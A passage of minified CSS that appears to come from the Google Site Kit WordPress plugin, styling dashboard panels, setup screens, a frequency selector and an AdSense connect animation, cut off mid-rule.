.googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__chip-item-new-dot::after{background-color:#573195;border-radius:50%;content:"";display:block;height:6px;right:0;top:0;width:6px}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-items-row{display:flex;flex-wrap:nowrap;gap:10px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-items-row{flex-wrap:wrap}}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-items-row:last-child .googlesitekit-chip-tab-group__chip-item:nth-last-child(2),.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-items-row:last-child .googlesitekit-chip-tab-group__chip-item:last-child{padding:6px 23px}}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__chip-item--active{background-color:#b8e5ca}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__chip-item-svg__suggested path{fill:#161b18}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__chip-item-count{margin-left:3px}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-selection-panel-item{align-items:center}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-selection-panel-item .googlesitekit-badge{background-color:#573195;color:#fff;font-size:12px;line-height:1.33;margin-right:1px;padding:4px 8px}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-selection-panel-item .googlesitekit-selection-box{padding:0 4px 10px}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__graphic{align-items:center;display:flex;flex-direction:column;margin-top:10%}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__graphic svg{max-height:160px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__graphic svg{max-height:unset}}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-item-mobile-svg{margin-right:7px}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-item-mobile-svg svg{display:block}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-item-mobile-svg.googlesitekit-chip-tab-group__tab-item-mobile-svg--suggested svg path{fill:#161b18}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-acr-km-selection-panel{width:578px}}.googlesitekit-plugin .googlesitekit-acr-km-selection-panel .googlesitekit-selection-panel-items{flex:1}.googlesitekit-plugin .googlesitekit-acr-km-selection-panel .googlesitekit-selection-panel-footer__actions{width:100%}.googlesitekit-plugin .googlesitekit-acr-km-selection-panel .googlesitekit-selection-panel-footer__actions .googlesitekit-selection-panel-footer__item-count{margin-right:auto;order:1}.googlesitekit-plugin .googlesitekit-acr-km-selection-panel .googlesitekit-selection-panel-footer__actions button{order:2}.googlesitekit-plugin .googlesitekit-km-selection-panel .googlesitekit-selection-panel-footer__actions{width:100%}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-km-selection-panel .googlesitekit-selection-panel-footer__actions{flex-wrap:wrap;justify-content:flex-end}}.googlesitekit-plugin .googlesitekit-km-selection-panel .googlesitekit-selection-panel-footer__actions .googlesitekit-selection-panel-footer__item-count{margin-right:auto;order:1}@media(max-width: 599px){.googlesitekit-plugin .googlesitekit-km-selection-panel .googlesitekit-selection-panel-footer__actions .googlesitekit-selection-panel-footer__item-count{order:1;text-align:left;width:100%}}.googlesitekit-plugin .googlesitekit-km-selection-panel .googlesitekit-selection-panel-footer__actions button{order:2}.googlesitekit-plugin .googlesitekit-acr-subtle-notification{padding:14px 24px}.googlesitekit-plugin .googlesitekit-widget--keyMetricsEventDetectionCalloutNotification .googlesitekit-widget__body,.googlesitekit-plugin .googlesitekit-widget--keyMetricsEventDetectionCalloutNotification .mdc-layout-grid{padding:0}.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsEventDetectionCalloutNotification{background:transparent}.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsEventDetectionCalloutNotification .googlesitekit-widget__body,.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsEventDetectionCalloutNotification .mdc-layout-grid,.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsEventDetectionCalloutNotification .mdc-layout-grid__inner{display:block}.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsEventDetectionCalloutNotification .googlesitekit-widget__body .mdc-layout-grid{margin:0}.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsEventDetectionCalloutNotification .googlesitekit-widget__body .mdc-layout-grid:nth-child(2){margin:15px 0 0}.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsEventDetectionCalloutNotification .googlesitekit-acr-subtle-notification{display:flex}.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-widgets .googlesitekit-widget--keyMetricsEventDetectionCalloutNotification .googlesitekit-cta-link{-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-plugin .googlesitekit-acr-subtle-notification__lost-events{background-color:#ffe4b1}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-acr-subtle-notification__lost-events{gap:10px}}.googlesitekit-plugin .googlesitekit-acr-subtle-notification__lost-events .mdc-button--raised:not(:disabled){background-color:#4e3300}.googlesitekit-plugin .googlesitekit-acr-subtle-notification__lost-events .googlesitekit-subtle-notification__content,.googlesitekit-plugin .googlesitekit-acr-subtle-notification__lost-events .mdc-button--tertiary:not(:disabled),.googlesitekit-plugin .googlesitekit-acr-subtle-notification__lost-events .googlesitekit-subtle-notification__icon svg{color:#4e3300}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change h2{font-size:28px}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change .mdc-dialog__content{margin-top:15px}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change .mdc-dialog__content h3{font-size:14px;font-weight:500;margin:0}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change ul.mdc-list.mdc-list--underlined li.mdc-list-item,.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change ul.mdc-list.mdc-list--underlined .googlesitekit-view-only-menu li.googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change ul.mdc-list.mdc-list--underlined li.googlesitekit-view-only-menu__list-item{font-size:12px;min-height:auto;padding:4px 0}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change ul.mdc-list.mdc-list--underlined li.mdc-list-item::before,.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change ul.mdc-list.mdc-list--underlined .googlesitekit-view-only-menu li.googlesitekit-view-only-menu__list-item::before,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change ul.mdc-list.mdc-list--underlined li.googlesitekit-view-only-menu__list-item::before{display:none}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change ul.mdc-list.mdc-list--underlined li.mdc-list-item:last-child,.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change ul.mdc-list.mdc-list--underlined .googlesitekit-view-only-menu li.googlesitekit-view-only-menu__list-item:last-child,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change ul.mdc-list.mdc-list--underlined li.googlesitekit-view-only-menu__list-item:last-child{border:none}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change .mdc-dialog__actions{border-top:none}@media(max-width: 600px){.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change .mdc-dialog__actions button{width:100%}.googlesitekit-plugin .mdc-dialog.googlesitekit-dialog-confirm-site-purpose-change .mdc-dialog__actions button:last-child{margin-top:5px}}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel{color:#6c726e}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-user-settings-selection__panel-content{display:flex;flex-direction:column;padding:16px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-user-settings-selection__panel-content{padding:24px}}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-selection-panel-header{padding:0 0 19px}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-selection-panel-header p{color:#6c726e}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-user-settings-selection__panel-description span{color:#161b18;display:block}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-selection-panel-subscribe-actions{display:flex;justify-content:flex-end;margin-top:30px}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-selection-panel-subscribe-actions .mdc-button--tertiary.googlesitekit-button-icon--spinner__running svg circle{stroke:#6c726e}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-selection-panel-footer{background:transparent;border-top:1px solid #ebeef0;margin-top:auto;padding:0}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-selection-panel-footer p{padding:16px 24px}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-selection-panel-footer .googlesitekit-notice{border-radius:0;margin-top:12px;padding:10px 24px;width:100%}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-selection-panel-footer .googlesitekit-notice p{font-size:12px;padding:0}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-selection-panel-footer__content{margin:0}.googlesitekit-plugin .googlesitekit-user-settings-selection-panel .googlesitekit-selection-panel-footer__content .googlesitekit-typography{margin:0}h3.googlesitekit-frequency-selector-title{color:#6c726e}.googlesitekit-frequency-selector__badge-row{display:grid;gap:16px;grid-template-columns:repeat(3, minmax(0, 1fr));margin-bottom:8px}.googlesitekit-frequency-selector__badge-cell{display:flex;justify-content:center}.googlesitekit-frequency-selector__current-subscription{background-color:#dce8ff;border-radius:4px;color:#446199;padding:0 8px;text-align:center;width:100%}.googlesitekit-frequency-selector__current-subscription p{margin:0;padding:4px 0}.googlesitekit-frequency-selector{display:grid;gap:16px;grid-template-columns:repeat(3, minmax(0, 1fr))}.googlesitekit-frequency-selector .googlesitekit-frequency-selector__card{background:#ebeef0;border-radius:8px;color:#161b18;cursor:pointer;padding:12px 16px}.googlesitekit-frequency-selector .googlesitekit-frequency-selector__card:focus-visible{outline:medium auto currentColor;outline:medium auto invert;outline:5px auto -webkit-focus-ring-color}.googlesitekit-frequency-selector .googlesitekit-frequency-selector__label-row{display:flex;justify-content:space-between;margin-bottom:4px}.googlesitekit-frequency-selector .googlesitekit-frequency-selector__period{border-bottom:1px solid #cbd0d3;padding-bottom:8px;padding-top:8px}.googlesitekit-frequency-selector .googlesitekit-frequency-selector__description{padding-bottom:8px;padding-top:8px}.googlesitekit-frequency-selector .googlesitekit-frequency-selector__card--selected{background:#b8e5ca}.googlesitekit-frequency-selector .googlesitekit-frequency-selector__card--selected .googlesitekit-frequency-selector__period{border-color:#93c9a8}.googlesitekit-plugin .googlesitekit-setup{padding-top:10px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-setup{padding-left:10px;padding-right:10px}}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-layout{overflow:hidden}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-opt-in{margin-bottom:8px;margin-top:8px}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-setup__step{border-bottom:1px solid #ebeef0;margin-bottom:16px;padding-bottom:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup .googlesitekit-setup__step{margin-bottom:24px;padding-bottom:24px}}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-setup__step:last-child{border-bottom:none;margin-bottom:0;padding-bottom:0}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-setup__title{display:inline-block;margin:.67em 0}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-setup__notice{font-weight:500}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-setup__description+.googlesitekit-setup__notice{margin-top:1em}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-setup__notice-text{display:inline-block;margin-left:5px;vertical-align:middle}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-setup__footer{border-top:1px solid #ebeef0}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-setup__splash{border-bottom:1px solid #ebeef0;padding-left:10px;padding-right:10px}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-setup__step-hint{display:flex;gap:4px;margin:13px 0 12px;padding:0 8px}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-setup__step-hint p{color:#6c726e;font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0}.googlesitekit-plugin .googlesitekit-setup .googlesitekit-setup__step-hint .googlesitekit-info-tooltip{color:#108080;display:flex}.googlesitekit-plugin .googlesitekit-setup-compat{max-width:60rem}.googlesitekit-plugin .googlesitekit-start-setup-wrap{display:flex}.googlesitekit-plugin .googlesitekit-start-setup{margin-right:8px}.googlesitekit-plugin .googlesitekit-start-setup+.googlesitekit-cta-link{margin-left:8px}.googlesitekit-plugin .googlesitekit-setup__wrapper{background-color:#fff;border-radius:16px}.googlesitekit-plugin .googlesitekit-setup__wrapper .googlesitekit-setup__intro-title{color:#161b18;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:700;line-height:1.14;margin:0 0 17px}.googlesitekit-plugin .googlesitekit-setup__warning{align-items:center;display:flex}.googlesitekit-plugin .googlesitekit-setup__warning svg{color:#895a00;width:34px}.googlesitekit-plugin .googlesitekit-setup__warning div{flex:1;margin:0 0 0 24px}.googlesitekit-plugin .googlesitekit-setup__content{margin:0 auto;max-width:465px;padding:2rem 0}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-setup__content{max-width:none;padding:0}}.googlesitekit-plugin .googlesitekit-setup__content .googlesitekit-setup__description{margin:0}.googlesitekit-plugin .googlesitekit-setup__content .googlesitekit-opt-in{margin:2rem 0}.googlesitekit-plugin .googlesitekit-setup__icon{text-align:center}.googlesitekit-plugin .googlesitekit-setup__icon svg{height:auto;max-width:100%}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-setup__icon{align-self:center;order:2}}.googlesitekit-plugin .googlesitekit-setup-analytics-notice{background-color:#f8fafb;border-radius:16px;display:flex;flex-direction:column-reverse;margin:24px 0 0;padding:16px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-setup-analytics-notice{padding:24px}}@media(min-width: 1280px){.googlesitekit-plugin .googlesitekit-setup-analytics-notice{align-items:center;flex-flow:row nowrap}}.googlesitekit-plugin .googlesitekit-setup-analytics-notice label{color:#333935;font-size:16px;letter-spacing:.5px;line-height:1.5;padding-top:8px}.googlesitekit-plugin .googlesitekit-setup-analytics-notice .mdc-form-field{align-items:flex-start}.googlesitekit-plugin .googlesitekit-setup-analytics-notice__icon{margin:0 0 24px}@media(min-width: 1280px){.googlesitekit-plugin .googlesitekit-setup-analytics-notice__icon{margin:0;padding-left:24px}}.googlesitekit-plugin .googlesitekit-setup-analytics-notice__icon svg{display:block;margin:0 auto;max-width:378px;width:100%}@media(min-width: 1280px){.googlesitekit-plugin .googlesitekit-setup-analytics-notice__icon svg{margin:0;width:378px}}.googlesitekit-tooltip.MuiTooltip-tooltip.googlesitekit-setup__step-hint-tooltip{max-width:220px}.googlesitekit-plugin .googlesitekit-splash{overflow:hidden}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-splash{padding-left:10px;padding-right:10px}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-splash{padding-bottom:0;padding-right:0}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-layout{overflow:hidden}.googlesitekit-plugin .googlesitekit-splash>.mdc-layout-grid{padding-bottom:0;padding-right:0}}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__title{color:#161b18}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__description{margin-top:24px}.googlesitekit-plugin .googlesitekit-splash .mdc-form-field{align-items:flex-start}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__analytics-opt-in-wrapper{margin-top:24px}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__analytics-opt-in-wrapper .mdc-checkbox{margin-top:-10px}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__analytics-opt-in-wrapper .mdc-checkbox__content{display:flex;flex-direction:column;gap:4px}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__analytics-opt-in-wrapper .mdc-checkbox__description{color:#6c726e;font-size:12px}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__analytics-opt-in-wrapper::after{background-color:#b8bdb9;content:"";display:block;height:1px;margin:24px 0}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__analytics-opt-in-wrapper .googlesitekit-splash__analytics-recommended-badge{background-color:#f1fff7;border-radius:4px;color:#3c7251;display:block;margin-top:14px;padding:4px 10px;width:fit-content}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-opt-in{margin-bottom:42px}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-opt-in label{color:#6c726e}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-opt-in label>span{display:inline}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-opt-in .mdc-checkbox{margin-top:-13px}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__splash-graphic-background{position:absolute;right:0;z-index:10}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__splash-graphic-screenshot{height:100%;width:100%}@media(max-width: 960px){.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__splash-graphic-screenshot{max-height:230px}}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__splash-graphic-screenshot svg{margin:0 4%;position:relative;top:40px;z-index:11}@media(max-width: 960px){.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__splash-graphic-screenshot svg{left:0}}.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__icon{position:relative}@media(max-width: 960px){.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__icon{align-items:content;display:flex;margin-bottom:24px;overflow:hidden}}@media(max-width: 960px){.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__content{padding-top:1rem}}@media(min-width: 961px){.googlesitekit-plugin .googlesitekit-splash .googlesitekit-setup__content{padding-bottom:24px}}.googlesitekit-plugin .googlesitekit-setup-module{flex:1 1 auto}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__step{margin-bottom:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__step{margin-bottom:24px}}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__step:last-child{margin-bottom:0}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__logo{display:inline-block;margin:0 16px 0 0}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__logo img{display:block;height:auto;width:40px}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__title{display:inline-block;margin:0 0 10px;vertical-align:bottom}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__text--no-margin{margin:0}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__inputs+p{margin-top:0}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__title+p{margin-bottom:0}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__title+p~p{margin-bottom:0}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__user{align-items:center;display:flex}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__user-image{border-radius:50%;height:32px;margin-right:10px;width:32px}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__inputs{align-items:center;display:flex;flex-wrap:wrap;margin:0}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__inputs>div{margin:16px 16px 16px 0}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__inputs>div{margin:24px 24px 24px 0}}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__inputs>.googlesitekit-setup-module__input{margin:1em 0}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__inputs+.googlesitekit-error-text{margin-top:-16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__inputs+.googlesitekit-error-text{margin-top:-24px}}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__inputs--collapsed{align-items:flex-start}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__inputs--collapsed>div{margin-top:0}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__inputs--multiline{display:block}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__inputs--multiline>div{margin:0;width:100%}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__switch{margin:16px 0}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__switch{margin:24px 0}}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__action{margin:24px 0 0 0}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__action{align-items:center;display:flex}}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__action{margin:36px 0 0 0}}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__action .googlesitekit-cta-link{font-size:14px;letter-spacing:.25px;line-height:1.43}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__action .mdc-button+.googlesitekit-cta-link{margin-left:24px}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__sub-action{display:flex;margin-top:16px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__sub-action{margin-left:8px;margin-top:0}}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__list-wrapper{background:#ebeef0;border-radius:16px;margin:16px 0 0 0;padding:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__list-wrapper{margin-top:24px}}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__cta{margin-top:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__cta{margin-top:24px}}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__cta-link{display:inline-block;margin-right:50px}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__cta-link:last-child{margin-right:0}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__action+.googlesitekit-setup-module__footer-text{margin:24px 0 0 0}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__action+.googlesitekit-setup-module__footer-text{margin:36px 0 0 0}}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__header{align-items:center;display:flex;flex-wrap:wrap;grid-gap:10px 12px}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__header .googlesitekit-setup-module__logo,.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__header .googlesitekit-setup-module__title{margin-bottom:0}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-setup-module__badges{align-items:center;display:flex;flex-wrap:wrap;gap:10px 12px}.googlesitekit-plugin .googlesitekit-setup-module .googlesitekit-notice--error:first-child{margin-bottom:1rem}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect{--adsense-connect-cta-fade-in-duration: 7.5s;--adsense-connect-cta-fade-out-duration: 500ms}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption-container{display:grid;grid-template-columns:1fr;margin:0}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption-container{display:block;padding:32px 0 0}}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption{color:#999f9b;display:flex;grid-column-start:1;grid-row-start:1;margin:0;opacity:0;transition:color 500ms ease-in-out}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption{margin-bottom:24px;opacity:1}}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption .googlesitekit-setup-module--adsense__stage-caption-indicator{align-self:stretch;background-color:rgba(0,0,0,.1);display:none;margin-right:20px;width:1px}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption .googlesitekit-setup-module--adsense__stage-caption-indicator{display:block}}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption h4{color:#7b807d;font-size:18px;font-weight:400;margin:0 0 4px}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption p{color:#7b807d;font-size:12px;margin:0}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption *{transition:inherit}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--static h4,.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--enter h4,.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--leave h4{color:#446199}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--static p,.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--enter p,.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--leave p{color:#333935}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--static{opacity:1}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--static .googlesitekit-setup-module--adsense__stage-caption-indicator{background-color:#446199}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--enter .googlesitekit-setup-module--adsense__stage-caption-indicator,.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--leave .googlesitekit-setup-module--adsense__stage-caption-indicator{background-image:linear-gradient(0deg, #446199 0%, #446199 100%);background-repeat:no-repeat}@keyframes googlesitekit-fade-in{0%{opacity:0}6.67%{opacity:1}100%{opacity:1}}@keyframes googlesitekit-fade-out{0%{opacity:1}50%{opacity:0}100%{opacity:0}}@keyframes googlesitekit-caption-indicator-enter{from{background-size:100% 0%}to{background-size:100% 100%}}@keyframes googlesitekit-caption-indicator-leave{from{background-size:100% 100%}to{background-size:100% 0%}}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--enter{animation:googlesitekit-fade-in var(--adsense-connect-cta-fade-in-duration) linear forwards}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--enter{animation:none}}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--enter .googlesitekit-setup-module--adsense__stage-caption-indicator{animation:googlesitekit-caption-indicator-enter 500ms linear forwards;background-position:0% 0%}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--leave{animation:googlesitekit-fade-out var(--adsense-connect-cta-fade-out-duration) linear forwards}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--leave{animation:none}}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-caption--current--leave .googlesitekit-setup-module--adsense__stage-caption-indicator{animation:googlesitekit-caption-indicator-leave 500ms linear forwards;background-position:0% 100%}.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect .googlesitekit-setup-module--adsense__stage-image-container{display:grid;grid-template-columns:1fr;height:100%;padding:16px 0;width:100%}@media(min-width: 601px){.googlesitekit-plugin .googlesitekit-setup__wrapper--adsense-connect 